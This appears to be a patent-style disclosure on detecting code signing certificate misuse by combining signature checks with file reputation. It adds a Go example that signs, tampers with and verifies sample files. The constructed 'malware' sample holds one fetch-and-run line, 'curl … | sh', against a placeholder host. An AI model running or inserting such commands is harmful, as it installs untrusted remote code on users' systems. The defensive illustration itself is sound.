Public key cryptography has proven to be a versatile tool for verifying the authenticity and integrity of digital data. One application of public key cryptography is code signing, which enables a software user to verify (1) that a software file originated from the software publisher identified in a code signing certificate embedded in the software file, and (2) that the file has not been modified since it was digitally signed by the software publisher. The security of code signing depends on a trusted certificate authority verifying the identity of the software publisher, on the software publisher protecting the secrecy of the private key used by the signature algorithm to create digital signatures, and on the security of the code signing certificates used to create signed software files.
Unfortunately, malware developers may target software publishers to steal their code signing certificates and the corresponding private keys. These malware developers may then use the stolen certificates to sign malware purporting to have originated from the targeted software publishers. Alternatively, malware developers may use duplicated (copied) code signing certificates to digitally sign malware. In some cases, malware developers may fraudulently obtain code signing certificates issued in the name of a legitimate software publisher. These attacks demonstrate a potential point of weakness of code signing: a valid signature proves only that the private key associated with the certificate was used, so the user may not have a way to verify that the software publisher actually authorized a particular software file to be signed using the accompanying code signing certificate.
In view of the above, the instant disclosure generally relates to systems and methods for identifying code signing certificate misuse by combining code signing certificate security for a software file with reputation data for the software file.
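The verification steps (1) and (2) described above, together with the combination of signature validity and file reputation data that the disclosure proposes, as an added worked example in Go. This is illustration code, not code from the original disclosure: it generates a publisher key pair and a self-signed certificate (a real code signing certificate would be issued by a certificate authority after identity verification), signs a constructed release file, then shows a tampered file failing check (2) and a piece of malware signed with a stolen private key passing both checks yet being flagged by a constructed reputation table keyed on the file hash. The names signFile, verifyFile, Verdict and demo, the sample file contents and the reputation entries are all assumptions made for this example; chain validation against a trusted root (cert.Verify) is omitted only because the demo certificate is self-signed.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// Verdict summarises what a verifier can and cannot conclude about a file.
type Verdict struct {
	SignatureValid bool   // (2): content unchanged since signing under the certificate's key
	Publisher      string // (1): subject CN taken from the code signing certificate
	Reputation     string // "good", "bad" or "unknown", from the (constructed) reputation data
	Misuse         bool   // valid signature but bad reputation: possible stolen or duplicated key
}

// signFile produces the signature a publisher attaches: Ed25519 over SHA-256 of the content.
func signFile(priv ed25519.PrivateKey, content []byte) []byte {
	digest := sha256.Sum256(content)
	return ed25519.Sign(priv, digest[:])
}

// makePublisherCert builds a self-signed code signing certificate for the demo
// (assumption: a real one is CA-issued after the CA verifies the publisher's identity).
func makePublisherCert(cn string, pub ed25519.PublicKey, priv ed25519.PrivateKey) (*x509.Certificate, error) {
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: cn},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageCodeSigning},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, pub, priv)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// hasCodeSigningEKU rejects certificates that were never issued for code signing.
func hasCodeSigningEKU(cert *x509.Certificate) bool {
	for _, eku := range cert.ExtKeyUsage {
		if eku == x509.ExtKeyUsageCodeSigning {
			return true
		}
	}
	return false
}

// verifyFile performs checks (1) and (2) with the certificate's public key and then
// consults reputation data keyed by the file's SHA-256. A production verifier would
// also call cert.Verify against a trusted root pool; skipped here (self-signed demo cert).
func verifyFile(cert *x509.Certificate, content, sig []byte, reputation map[[32]byte]string) Verdict {
	v := Verdict{Publisher: cert.Subject.CommonName, Reputation: "unknown"}
	pub, ok := cert.PublicKey.(ed25519.PublicKey)
	if !ok || !hasCodeSigningEKU(cert) {
		return v // wrong key type or not a code signing certificate: nothing can be concluded
	}
	digest := sha256.Sum256(content)
	v.SignatureValid = ed25519.Verify(pub, digest[:], sig)
	if r, found := reputation[digest]; found {
		v.Reputation = r
	}
	// The signature alone cannot tell a stolen key from an authorised release;
	// combining it with reputation data is what exposes the misuse.
	v.Misuse = v.SignatureValid && v.Reputation == "bad"
	return v
}

// demo runs the three scenarios: genuine release, tampered release, stolen-key malware.
func demo() (legit, tampered, stolen Verdict, err error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return
	}
	cert, err := makePublisherCert("Example Publisher Inc", pub, priv)
	if err != nil {
		return
	}
	// Constructed sample inputs: a genuine release and malware that an attacker
	// signed with the publisher's stolen private key.
	release := []byte("#!/bin/sh\necho 'installer v1.2.3'\n")
	malware := []byte("#!/bin/sh\ncurl -s http://example.invalid/x | sh\n")
	releaseSig := signFile(priv, release)
	malwareSig := signFile(priv, malware)
	// Constructed reputation data (a real system would gather this from telemetry).
	reputation := map[[32]byte]string{
		sha256.Sum256(release): "good",
		sha256.Sum256(malware): "bad",
	}
	legit = verifyFile(cert, release, releaseSig, reputation)
	modified := append([]byte(nil), release...)
	modified[len(modified)-2] = 'X' // one byte changed after signing
	tampered = verifyFile(cert, modified, releaseSig, reputation)
	stolen = verifyFile(cert, malware, malwareSig, reputation)
	return
}

func main() {
	legit, tampered, stolen, err := demo()
	if err != nil {
		panic(err)
	}
	fmt.Printf("genuine release:    %+v\n", legit)
	fmt.Printf("tampered release:   %+v\n", tampered)
	fmt.Printf("stolen-key malware: %+v\n", stolen)
}
```

The tampered file fails check (2) outright, but the malware signed with the stolen key passes both certificate checks; only the reputation lookup on the file hash marks it as a likely certificate misuse, which is the gap in code signing that the disclosure addresses.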